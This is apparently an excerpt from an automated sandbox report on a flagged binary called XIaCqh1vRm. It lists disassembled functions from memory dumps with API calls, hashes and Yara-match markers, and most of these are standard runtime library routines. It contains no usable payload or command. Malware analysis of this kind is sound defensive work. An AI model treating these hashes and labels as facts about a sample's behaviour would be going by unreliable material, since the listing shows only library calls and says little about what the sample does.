                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                          • String ID: eventObject
                                                                                                                                                                                                                                                                          • API String ID: 1999291547-1680012138
                                                                                                                                                                                                                                                                          • Opcode ID: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                                                                                                                                                                                                                                          • Instruction ID: 481122be4c91591a449bb5dcd4d0178f9edd258f0a599c8a0e64e7baae7edbbd
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A11A075500104EACB14EFA5CC49FEF77B8AF00701F24022BF519E21D1EB789A84C66D
                                                                                                                                                                                                                                                                          Function 024B0C26 Relevance: 15.1, APIs: 10, Instructions: 136threadCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 024B0C36
                                                                                                                                                                                                                                                                          • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 024B0C9D
                                                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 024B0CBA
                                                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 024B0D20
                                                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 024B0D35
                                                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 024B0D47
                                                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 024B0D75
                                                                                                                                                                                                                                                                          • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 024B0D80
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 024B0DAC
                                                                                                                                                                                                                                                                          • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 024B0DBC
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3720063390-0
                                                                                                                                                                                                                                                                          • Opcode ID: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
                                                                                                                                                                                                                                                                          • Instruction ID: 786d573ca87ffe611f688709f5500a60eecc739d42592a39fd8531b607247f3d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6741B330A042449BCF1AFFA5C4A47EE7BA6AF15305F0450AFD8095B3C2DB659A0ACF71
                                                                                                                                                                                                                                                                          Function 00431DE6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00431DFA
                                                                                                                                                                                                                                                                            • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                                                            • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00431E06
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00431E11
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00431E1C
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00431E27
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00431E32
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00431E3D
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00431E48
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00431E53
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00431E61
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                                          • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                                                          • Instruction ID: 861173ad91a1010c78510ab484a24ed9c78665ad215b99cbbf48ba7f2ea438f1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5811B9B6600508BFDB02EF5AC852CD93BA5EF18755F0190AAF9084F232D635DF559F84
                                                                                                                                                                                                                                                                          Function 024C204D Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C2061
                                                                                                                                                                                                                                                                            • Part of subcall function 024C36D1: HeapFree.KERNEL32(00000000,00000000,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?), ref: 024C36E7
                                                                                                                                                                                                                                                                            • Part of subcall function 024C36D1: GetLastError.KERNEL32(?,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?,?), ref: 024C36F9
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C206D
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C2078
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C2083
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C208E
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C2099
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C20A4
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C20AF
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C20BA
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C20C8
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                                          • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                                                          • Instruction ID: 0f68bc051604a93f9ce8e542ecc60d661016fa722728ebdc5245b7f71ea2c3c4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09114779710108AFCB91FF5AC941DD93FA6EF04750B6181AABA094F261D771EE609F80
                                                                                                                                                                                                                                                                          Function 0042E1B2 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 200COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: __cftoe
                                                                                                                                                                                                                                                                          • String ID: F(@$F(@
                                                                                                                                                                                                                                                                          • API String ID: 4189289331-2038261262
                                                                                                                                                                                                                                                                          • Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                                                                                                                                                                                                          • Instruction ID: f7128e803ecc638eadc91937d15ccb8599414b14ec088efe1e3a9152a03639fe
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35511A32600215EBEB209F5BAC41FAF77A9EF49324F94425FF81592282DB39D900866D
                                                                                                                                                                                                                                                                          Function 0043EEA2 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044018F), ref: 0043EEC5
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: DecodePointer
                                                                                                                                                                                                                                                                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                                                                                          • API String ID: 3527080286-3064271455
                                                                                                                                                                                                                                                                          • Opcode ID: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
                                                                                                                                                                                                                                                                          • Instruction ID: 8170d9845b751ca2959588a2f937d780391b5e174033125a046a2bd7c9c475e6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3351AF7090050EDBDF14DF99E6481ADBBB0FB4D300F2551A7E480A7295C77A8D29CB1E
                                                                                                                                                                                                                                                                          Function 024C3190 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                                                                                                                                                                                                                                          • Instruction ID: c01345a6aba6f99cc68671fc9a445fcd6e03ffdfd8eb45b103531f9227e7a0b5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54C1E278E04245ABCB52DFADC840BEEBFB5AF09304F6481DEE814AB391C7709941CB65
                                                                                                                                                                                                                                                                          Function 004286D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 004286FB
                                                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00428703
                                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00428791
                                                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 004287BC
                                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00428811
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                          • String ID: fB$csm
                                                                                                                                                                                                                                                                          • API String ID: 1170836740-1586063737
                                                                                                                                                                                                                                                                          • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                                                          • Instruction ID: 7444ce20eee9e01817f939fbe5b18052b9a848ec9e24e3aae95877e68e098c30
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F241FB34F012289BCF10DF19DC41A9EBBB5AF84318F64816FE9145B392DB399D11CB99
                                                                                                                                                                                                                                                                          Function 00428CBD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D10
                                                                                                                                                                                                                                                                          • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D29
                                                                                                                                                                                                                                                                          • FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D30
                                                                                                                                                                                                                                                                          • PMDtoOffset.LIBCMT ref: 00428D4F
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FindInstanceTargetType$Offset
                                                                                                                                                                                                                                                                          • String ID: Bad dynamic_cast!
                                                                                                                                                                                                                                                                          • API String ID: 1467055271-2956939130
                                                                                                                                                                                                                                                                          • Opcode ID: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
                                                                                                                                                                                                                                                                          • Instruction ID: 5e24beb8d8256b5c5f325d4796605ad5260749f939022e6450d69b98b3545f73
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD2137727062259FCB04DF65F902A6E77A4EF64714B60421FF900932C1DF3CE80586A9
                                                                                                                                                                                                                                                                          Function 024AC6C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • atomic_compare_exchange.LIBCONCRT ref: 024AC6DC
                                                                                                                                                                                                                                                                          • atomic_compare_exchange.LIBCONCRT ref: 024AC700
                                                                                                                                                                                                                                                                          • std::_Cnd_initX.LIBCPMT ref: 024AC711
                                                                                                                                                                                                                                                                          • std::_Cnd_initX.LIBCPMT ref: 024AC71F
                                                                                                                                                                                                                                                                            • Part of subcall function 02491370: __Mtx_unlock.LIBCPMT ref: 02491377
                                                                                                                                                                                                                                                                          • std::_Cnd_initX.LIBCPMT ref: 024AC72F
                                                                                                                                                                                                                                                                            • Part of subcall function 024AC3EF: __Cnd_broadcast.LIBCPMT ref: 024AC3F6
                                                                                                                                                                                                                                                                          • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 024AC73D
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
                                                                                                                                                                                                                                                                          • String ID: t#D
                                                                                                                                                                                                                                                                          • API String ID: 4258476935-1671555958
                                                                                                                                                                                                                                                                          • Opcode ID: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
                                                                                                                                                                                                                                                                          • Instruction ID: a540ffa58f75eb57f18687293ca5bbf1f46a396b577690c6308ad402697d5fd8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C01F775900605A7DF11B762CD95B9EB76ABF10310F14001BE80997780DBB4AA158FD2
                                                                                                                                                                                                                                                                          Function 00432134 Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D938,0042D938,?,?,?,00432385,00000001,00000001,23E85006), ref: 0043218E
                                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 004321C6
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432385,00000001,00000001,23E85006,?,?,?), ref: 00432214
                                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 004322AB
                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043230E
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 0043231B
                                                                                                                                                                                                                                                                            • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00432324
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00432349
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3864826663-0
                                                                                                                                                                                                                                                                          • Opcode ID: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
                                                                                                                                                                                                                                                                          • Instruction ID: 93f6329b7fe105f45c70b5aed5e0df07748c8d3fe3b6be6f44c821e7de56536e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5851F472610216AFDB258F71CE41EAF77A9EB48B54F14522AFD04D7280DBBCDC40C698
                                                                                                                                                                                                                                                                          Function 024C1129 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C1444
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C145D
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C148F
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C1498
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C14A4
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$ErrorLast
                                                                                                                                                                                                                                                                          • String ID: C
                                                                                                                                                                                                                                                                          • API String ID: 3291180501-1037565863
                                                                                                                                                                                                                                                                          • Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                                                                                                                                                                                                                          • Instruction ID: 0174e17bd8256397e2bb95e95aa0b9571352f9f89f873a19963941fa4aa1829d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14B12679A012199BDB65DF18C884BAEB7B5FB48304F2085AED84DA7351D770AE90CF80
                                                                                                                                                                                                                                                                          Function 00439EAE Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                                                                                                          • Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                                                                                                                                                                                                          • Instruction ID: bfd9ead29151d2877f631d1061df4e601ee651aa38b3335c59b440bd117a4214
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9361F171900205AFDB20DF69C842B9EBBF4EB08710F14516BE884EB382E7399D41CB59
                                                                                                                                                                                                                                                                          Function 024CA115 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                                                                                                          • Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                                                                                                                                                                                                                          • Instruction ID: 5951c86e5e6e204d0ee8af657f033095aff449d5c3a18a4a25b5e6a03ac25a25
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB61E179A00229AFDBA0DF6DC841B9ABBF5EB44710F3441AFE844EB345D771A941CB90
                                                                                                                                                                                                                                                                          Function 00433883 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetConsoleCP.KERNEL32(?,0042C23D,E0830C40,?,?,?,?,?,?,00433FF8,0040DDD5,0042C23D,?,0042C23D,0042C23D,0040DDD5), ref: 004338C5
                                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 00433940
                                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 0043395B
                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,0042C23D,00000001,?,00000005,00000000,00000000), ref: 00433981
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339A0
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,0040DDD5,00000001,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339D9
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                          • Opcode ID: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
                                                                                                                                                                                                                                                                          • Instruction ID: 0964c92a74c3400c6cb4ab9b4b67413798647f05f85f7adc4f4dadb846cf7038
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
